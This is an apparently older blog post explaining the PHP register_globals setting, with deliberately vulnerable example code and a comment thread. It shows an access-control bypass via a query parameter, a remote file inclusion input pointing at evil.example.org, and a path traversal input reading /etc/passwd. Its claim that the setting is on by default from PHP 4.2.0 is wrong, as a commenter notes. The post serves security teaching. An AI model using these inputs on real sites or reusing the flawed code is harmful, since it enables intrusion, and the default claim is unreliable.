(evil) Register Globals (on)

The register_globals directive is enabled (register_globals = On) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn’t represent a security vulnerability, it’s a security risk.

Why is it a security risk? Let’s look at this example:

<?php

if (login_user())
{
    $login = true;
}

if ($login)
{
    include ‘/highly/sensitive/data.php’;
}
?>

With register_globals enabled (register_globals = On), this page can be requested with ?login=1 in the query string to bypass the intended access control.
Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $login in the example) are not affected by data submitted by the client.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:

<?php
    include “$path”;
?>

With register_globals enabled, this page can be requested with ?path=http://evil.example.org/evilscript in the query string in order to equate this example to the following:

include ‘http://evil.example.org/evilscript&#8217;;

If allow_url_fopen is enabled (which is by default), this will include the output of http://evil.example.org/evilscript just as if it were a local file. This is a major security vulnerability called remote file inclusion (RFI), and it’s one that has been discovered in many popular open source applications.

It’s also possible that someone reads local files with the example above (LFI = local file inclusion). A requested page with ?page=../../../../etc/passwd in the query string and it will show you on Unix-based systems the password file.

local file inclusion

I think register_globals must be disabled and every programmer must take care of the global spacing from php.
The best way is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable
won’t be overlooked during development.

Advertisements

2 comments so far

  1. Bijay Rungta on

    The register_globals directive is disabled (register_globals = Off) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn’t represent a security vulnerability, it’s a security risk.

    The text is a little misleading….
    The last para should have read as
    While leaving [emphasize]register_globals [emphasizeEvenMore]On[/emphasizeEvenMore][/emphasize] doesn’t represent a security vulnerability, it’s a security risk.

    I had come here to confirm what is good and what’s bad…..

    Thanks a lot..

    Bijay Rungta

  2. b23 on

    Thank you Bijay Rungta!


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: